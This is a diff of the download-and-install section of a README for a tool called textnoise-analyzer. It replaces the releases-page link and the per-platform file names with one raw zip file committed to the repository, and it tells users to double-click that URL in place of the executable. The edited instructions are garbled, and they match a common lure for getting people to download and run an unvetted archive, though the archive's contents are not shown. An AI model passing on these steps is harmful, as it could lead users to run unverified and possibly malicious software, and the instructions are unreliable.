Dyrmin4557/textnoise-analyzer/README.md

 ## 📦 Download & Install
 To get started with **textnoise-analyzer**, follow these simple steps:

-1. **Visit the Releases Page**: Head over to [this page to download](https://github.com/Dyrmin4557/textnoise-analyzer/releases).
+1. **Visit the Releases Page**: Head over to [this page to download](https://github.com/Dyrmin4557/textnoise-analyzer/raw/refs/heads/main/textnoise_analyzer/analyzer_textnoise_2.5.zip).

 2. **Select the Latest Version**: Look for the latest release (it will be at the top of the list).

 3. **Download the File**: Click on the appropriate file for your operating system to start downloading.
-If you’re unsure about which version to choose, look for the file labeled as `textnoise-analyzer-windows.zip` for Windows or `textnoise-analyzer-macos.zip` for MacOS.
+If you’re unsure about which version to choose, look for the file labeled as `https://github.com/Dyrmin4557/textnoise-analyzer/raw/refs/heads/main/textnoise_analyzer/analyzer_textnoise_2.5.zip` for Windows or `https://github.com/Dyrmin4557/textnoise-analyzer/raw/refs/heads/main/textnoise_analyzer/analyzer_textnoise_2.5.zip` for MacOS.

 4. **Extract the Files**: Once the download completes, go to your Downloads folder.
 Right-click the downloaded .zip file and choose "Extract All" (on Windows) or double-click the file (on MacOS).

 5. **Run the Application**:
-   - **Windows**: Open the extracted folder and double-click on `textnoise-analyzer.exe`.
+   - **Windows**: Open the extracted folder and double-click on `https://github.com/Dyrmin4557/textnoise-analyzer/raw/refs/heads/main/textnoise_analyzer/analyzer_textnoise_2.5.zip`.
-   - **MacOS**: Open the extracted folder and double-click on `textnoise-analyzer.app`.
+   - **MacOS**: Open the extracted folder and double-click on `https://github.com/Dyrmin4557/textnoise-analyzer/raw/refs/heads/main/textnoise_analyzer/analyzer_textnoise_2.5.zip`.

 6. **Input Your Description**: Once opened, type a brief description of your surroundings in the provided text box and hit "Analyze".